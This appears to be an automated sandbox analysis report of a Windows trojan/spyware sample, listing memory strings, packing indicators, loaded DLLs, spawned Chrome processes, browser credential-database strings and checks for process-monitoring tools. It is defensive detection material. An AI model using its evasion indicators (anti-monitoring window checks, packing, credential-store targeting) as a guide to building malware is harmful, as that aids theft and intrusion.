Source: 0zBsv1tnt4.exe, 00000000.00000003.1754446126.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750190869.00000000061BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754752682.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757248589.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1752408659.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740927812.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743156369.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744452780.0000000006066000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748217188.0000000006190000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745262579.000000000606C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746350752.0000000006084000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753356306.00000000061CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745633174.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748075823.0000000006089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740750624.0000000006024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741197031.0000000006035000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755062115.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743865487.0000000006062000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753968777.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744891784.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743977874.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756399432.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742848021.0000000006049000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753664817.00000000060C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1877406895.0000000006516000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756610935.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741382035.0000000006029000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740289499.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.000000000624B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757085700.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746866682.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740661280.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744585438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749142697.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747250816.0000000006089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe

Source: 0zBsv1tnt4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0zBsv1tnt4.exe

Static PE information: Section: ZLIB complexity 0.9996425653594772

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/67@9/5

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_00982070 CoCreateInstance,

0_2_00982070

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0zBsv1tnt4.exe, 00000000.00000003.1512072127.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1536544821.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1537140056.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511972385.0000000005B06000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 0zBsv1tnt4.exe	Virustotal: Detection: 52%
Source: 0zBsv1tnt4.exe	ReversingLabs: Detection: 57%

Source: 0zBsv1tnt4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 1RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

File read: C:\Users\user\Desktop\0zBsv1tnt4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0zBsv1tnt4.exe "C:\Users\user\Desktop\0zBsv1tnt4.exe"
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 0zBsv1tnt4.exe

Static file information: File size 2997760 > 1048576

Source: 0zBsv1tnt4.exe

Static PE information: Raw size of xkuacxgz is bigger than: 0x100000 < 0x2b2200

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Unpacked PE file: 0.2.0zBsv1tnt4.exe.950000.0.unpack :EW;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 0zBsv1tnt4.exe

Static PE information: real checksum: 0x2e58ac should be: 0x2dfedd

Source: 0zBsv1tnt4.exe	Static PE information: section name:
Source: 0zBsv1tnt4.exe	Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe	Static PE information: section name: .idata
Source: 0zBsv1tnt4.exe	Static PE information: section name: xkuacxgz
Source: 0zBsv1tnt4.exe	Static PE information: section name: pzmqirjh
Source: 0zBsv1tnt4.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00987069 push es; retf	0_2_00987074
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098C990 push eax; mov dword ptr [esp], 5C5D5E5Fh	0_2_0098C99E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009939A1 push es; ret	0_2_009939A2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096B324 push F3B90099h; retf	0_2_0096B32A

Source: 0zBsv1tnt4.exe

Static PE information: section name: entropy: 7.97845575818733

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
